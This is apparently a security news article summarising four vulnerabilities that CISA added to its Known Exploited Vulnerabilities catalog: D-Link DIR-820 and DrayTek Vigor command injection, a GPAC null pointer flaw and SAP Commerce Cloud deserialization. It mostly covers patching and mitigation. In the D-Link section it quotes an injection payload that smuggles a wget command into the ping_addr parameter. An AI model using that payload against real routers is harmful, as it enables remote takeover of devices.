4 Critical High-Severity Vulnerabilities: CISA has added four critical vulnerabilities to its Known Exploited Vulnerabilities catalog, drawing attention to serious risks affecting D-Link and DrayTek routers, the GPAC multimedia framework, and SAP Commerce Cloud.
Introduction
The Cybersecurity and Infrastructure Security Agency (CISA) has recently added four new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, indicating active exploitation in the wild. These vulnerabilities pose significant threats to organizations utilizing the affected technologies.
CISA’s latest update highlights several critical issues. CVE-2023-25280 addresses an OS command injection vulnerability in the D-Link DIR-820 router. Similarly, CVE-2020-15415 impacts multiple DrayTek Vigor routers and also involves an OS command injection flaw.
Additionally, CVE-2021-4043 pertains to a null pointer dereference vulnerability in the Motion Spell GPAC multimedia framework. Lastly, CVE-2019-0344 involves the deserialization of untrusted data in SAP Commerce Cloud, posing a significant risk to systems using this platform.
Related: Critical SAP Zero-Day (CVE-2024-41730) Exploited by Initial Access Brokers
Vulnerability Technical Overview
CVE-2023-25280: Vulnerability in D-Link DIR-820 Router
On March 16, 2023, a severe OS command injection vulnerability was discovered in the D-Link DIR-820LA1_FW105B03 router, allowing attackers to gain root privileges.
This issue is triggered through a specially crafted payload targeting the ping_addr parameter, presenting a significant risk to internet-connected devices. The vulnerability is found in the pingV4Msg function of the “/ping.ccp” component, which lets attackers escalate privileges to root.
The affected version is DIR820LA1_FW105B03, and the vulnerability is located within the /sbin/ncc2 file directory. Specifically, the sub_49EDF8 function pulls the ping_addr variable from requests to /ping.ccp, enabling system command execution. When the ccp_act parameter is set to pingV4Msg, the ccp_ping function references this vulnerable part, allowing command injection.
Although there were attempts to filter malicious inputs, the function fails to properly filter characters like %0a and $, allowing attackers to bypass security measures. To exploit the flaw, an attacker can use tools like the FirmAE simulation firmware, setting up a local web server and using an attack vector such as “ccp_act=pingV4Msg&ping_addr=%0awget hxxp://192.168.0.2%0a” to trigger the vulnerability.
CVE-2020-15415: Security Flaw in DrayTek Vigor Routers
This vulnerability impacts DrayTek Vigor3900, Vigor2960, and Vigor300B routers running firmware versions earlier than 1.5.1. It allows remote command execution through shell metacharacters in filenames, especially when the text/text/ text/x-python-script content type is used, posing a serious threat to users. The issue is documented under CVE-2020-14472 and CVE-2020-15415, both of which are classified as critical.
DrayTek has acknowledged the risk of exploitation through the WebUI on the Vigor 2960, 3900, and 300B models. On June 17, 2020, the company released firmware version 1.5.1.1 to resolve the vulnerability. Affected users are strongly encouraged to upgrade to this or a later version. Until the upgrade is completed, users should disable remote access or apply an access control list (ACL) to restrict remote access.
Firmware updates are available for users in the UK and Ireland. Users with remote access enabled should disable it if it’s unnecessary, and if remote access is required, it should be limited to a list of trusted IP addresses via an ACL. Alternatively, users can secure remote administration through a VPN or manage their devices centrally using VigorACS.
CVE-2021-4043: Vulnerability in Motion Spell GPAC
On February 4, 2022, a null pointer dereference vulnerability was discovered in the GPAC library, affecting versions prior to 1.1.0. Classified as a medium severity risk with a CVSS score of 5.8, this vulnerability falls under CWE-476, which addresses issues related to dereferencing null pointers—where the software attempts to access a pointer expected to be valid, but it is actually null.
The most common consequence of such vulnerabilities is a denial of service (DoS), as dereferencing a null pointer often results in process crashes unless proper exception handling is in place. Even with exception handling, restoring the software to a stable state can be difficult. In rare cases, if the null pointer corresponds to the memory address 0x0 and privileged code is able to access it, it could potentially lead to unauthorized code execution or memory manipulation.
To mitigate the risks associated with null pointer dereference vulnerabilities, it is essential to verify all pointers for null values before using them. Choosing programming languages that inherently reduce the risk of such issues can also be helpful. Developers should ensure that all function return values are checked for null before use. Additionally, care must be taken to prevent race conditions in concurrent environments, which could introduce additional risks.
CVE-2019-0344: Security Vulnerability in SAP Commerce Cloud
On August 14, 2019, a vulnerability in SAP Commerce Cloud was discovered, stemming from unsafe deserialization, which affects multiple versions and could allow arbitrary code execution with ‘Hybris’ user rights. Identified as CVE-2019-0344, this issue specifically impacts versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, and 1905 of the virtualjdbc extension, making it susceptible to code injection attacks.
CVE-2019-0344 is particularly dangerous because it allows attackers to execute arbitrary code on a target system by exploiting insecure deserialization within the virtualjdbc extension. This could lead to unauthorized code execution on affected systems with the privileges of the ‘Hybris’ user.
The vulnerability’s technical details highlight the critical risk of code injection due to the insecure deserialization process. To mitigate this, users must act quickly by applying security patches released by SAP, monitoring for unusual system activity, and restricting access to vulnerable systems.
For long-term security, it is vital to keep SAP Commerce Cloud up-to-date with the latest patches and follow secure coding practices to prevent future code injection vulnerabilities. Regular updates and patching are key to protecting systems running the virtualjdbc extension from exploitation.
Conclusion
CISA’s recent update to its Known Exploited Vulnerabilities (KEV) catalog underscores the critical risks posed by several vulnerabilities in widely used technologies, including D-Link and DrayTek routers, the GPAC multimedia framework, and SAP Commerce Cloud. These vulnerabilities, CVE-2023-25280, CVE-2020-15415, CVE-2021-4043, and CVE-2019-0344, highlight the importance of timely patching and secure system configurations to prevent potential exploitation.
Organizations using affected devices or software should immediately implement available security patches, disable unnecessary remote access, and follow best practices for secure coding and system maintenance. By staying vigilant and proactive in addressing these vulnerabilities, organizations can significantly reduce the risk of unauthorized access, code execution, and service disruptions.
The ongoing threat landscape emphasizes the need for continuous monitoring, regular updates, and robust security practices to safeguard sensitive systems and data from exploitation.